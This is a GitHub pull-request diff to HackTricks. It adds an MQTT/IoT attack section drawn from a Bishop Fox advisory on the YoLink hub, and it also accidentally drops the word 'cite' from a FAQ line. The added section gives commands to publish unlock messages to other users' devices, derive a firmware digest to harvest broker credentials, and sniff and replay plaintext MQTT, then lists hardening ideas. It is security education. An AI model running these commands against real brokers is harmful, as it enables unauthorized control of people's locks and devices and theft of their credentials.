Skip to content

YoSmart YoLink Hub version 0382 #1466

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

YoSmart YoLink Hub version 0382 #1466

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
102 changes: 100 additions & 2 deletions src/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -116,11 +116,109 @@ Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header
- DISCONNECT (14): Initiated by the client to terminate the connection.
- Two values, 0 and 15, are marked as reserved and their use is forbidden.

## IoT/MQTT attack patterns (broker ACLs, cloud APIs, cleartext transport)

The following practical attack flows are commonly seen in consumer IoT stacks that rely on cloud MQTT brokers and mobile apps.

### 1) Predictable device IDs + weak broker ACLs = cross-account control

Many vendors authorize publish/subscribe access based only on the topic pattern, not on device ownership. If device IDs are predictable (e.g., equal to the device MAC), an attacker can control other users’ devices by publishing to their control topics.

- Typical topic layout:
- Control: `/vendor/<deviceId>/tx`
- Status: `/vendor/<deviceId>/rx`
- Finding device IDs:
- Local sniffing: capture Wi‑Fi frames to learn the hub/device MAC (e.g., with airodump-ng).
- Firmware/UART: boot logs or binaries often print/contain the device ID/MAC.
- Test for weak ACLs by publishing to a foreign deviceId while authenticated with any valid account/broker credentials:

```bash
# Example using mosquitto_pub (plaintext MQTT on a nonstandard port, adjust host/port)
mosquitto_pub -h mq.example.com -p 8001 \
-i "APP-123456" -u "appUser" -P "appPass" \
-t "/vendor/d88bCAFEBABE/tx" \
-m '{"method":"Device.setState","params":{"state":{"lock":"unlocked"}},"targetDevice":"d88bCAFEBABE"}' -d
```

Notes
- If the action succeeds and you are not the owner of the target device, the broker is missing per-device authorization.
- Predictable IDs are frequently MAC-based (check the device OUI) or derived from serials.

### 2) Cloud API credential harvest via firmware-derived secret

Some ecosystems expose undocumented cloud endpoints that return per-device MQTT credentials when given a deviceId plus a digest derived from a hardcoded secret. Reverse engineer the firmware to recover the secret and reproduce the digest.

- Reverse engineering hints:
- Search for HTTP client code and strings like "/pf/", "/cfg/", "mqtt", "md5", "sha1", "token".
- Look for code building a string `sprintf("%s_%s", deviceId, SECRET)` then hashing it.
- Dumped secrets are often reused across models/regions.
- See also the Firmware Analysis page for extracting and reversing device images:

{{#ref}}
../hardware-physical-access/firmware-analysis/README.md
{{#endref}}

- Reproduce the digest and pull credentials:

```bash
# Example: compute uppercased MD5 of <deviceId><secret>
SECRET="cf50DEADBEEF"; DEV="d88bCAFEBABE";
echo -n "${DEV}${SECRET}" | md5sum | awk '{print toupper($1)}'
# -> 100B65ABCDEF...

# Query the cloud endpoint with deviceId and MD5
curl -s "https://api.example.com/pf/${DEV}/100B65ABCDEF" | jq .
# Expect JSON containing broker URL, clientId/username/password, etc.
```

- Abuse the harvested credentials to subscribe to privileged/admin topics that may leak sensitive info or accept control commands:

```bash
mosquitto_sub -h mq.example.com -p 8001 \
-i "SG-${DEV}" -u "${DEV}" -P "<brokerPwd>" \
-t "ylgw*/admin" -v
# Look for Wi‑Fi SSID/password pushes, pairing tokens, debug commands, etc.
```

### 3) Exploiting cleartext MQTT transport (no TLS)

Plaintext MQTT makes credential and payload interception trivial on-path or locally:

- Indicators in captures: strings like "MQTT" or legacy "MQIsdp", clear-text clientId/username/password and topic names.
- Observe and replay commands captured on TCP/1883 or vendor-specific plaintext ports (e.g., 8001):

```bash
# Sniff
sudo tcpdump -i <IFACE> -A -s0 'tcp port 1883 or tcp port 8001'
# Replay a captured control message
mosquitto_pub -h mq.example.com -p 8001 -i "APP-..." -u "..." -P "..." \
-t "/vendor/<deviceId>/tx" -m '<captured JSON>'
```

If broker ACLs are weak (see 1), cleartext transport amplifies impact by enabling credential reuse and offline analysis.

### 4) Abusing long-lived sessions/tokens

If logout does not invalidate tokens, old MQTT credentials may keep working for days/weeks. Test by reusing historical clientId/username/password values in your MQTT client even after user logout/app reinstall. Some brokers are lax about clientId formats (e.g., overly long IDs or unexpected characters) and will still accept/route messages.

### Detection and hardening ideas

- Enforce per-device ACLs on the broker (e.g., allow publish to `/vendor/<ownDeviceId>/tx` only for the device owner account).
- Make device IDs non-predictable and never equal to MACs/serials; validate `targetDevice` fields server-side.
- Remove undocumented endpoints that mint credentials from easily-derived digests; use HMAC with rotated secrets if needed.
- Require TLS for all MQTT clients (hubs, apps) and validate server certs.
- Shorten session/token lifetimes and invalidate them on logout.
- Network monitoring: alert on outbound plaintext MQTT (tcp/1883 or vendor ports like 8001) and on suspicious topics (e.g., `*/admin`, `/vendor/*/(tx|rx)`).

## Shodan

- `port:1883 MQTT`

{{#include ../banners/hacktricks-training.md}}

## References

- [YoSmart YoLink Hub version 0382 (Bishop Fox)](https://bishopfox.com/blog/yosmart-yolink-hub-version-0382)
- [Aircrack-ng (airodump-ng)](https://www.aircrack-ng.org/)
- [Ghidra SRE](https://ghidra-sre.org/)
- [Eclipse Mosquitto clients](https://mosquitto.org/)

{{#include ../banners/hacktricks-training.md}}
3 changes: 1 addition & 2 deletions src/welcome/hacktricks-values-and-faq.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con

> [!TIP]
>
> - **How can I cite a page of HackTricks?**
> - **How can I a page of HackTricks?**

As long as the link **of** the page(s) where you took the information from appears it's enough.\
If you need a bibtex you can use something like:
Expand Down Expand Up @@ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the

{{#include ../banners/hacktricks-training.md}}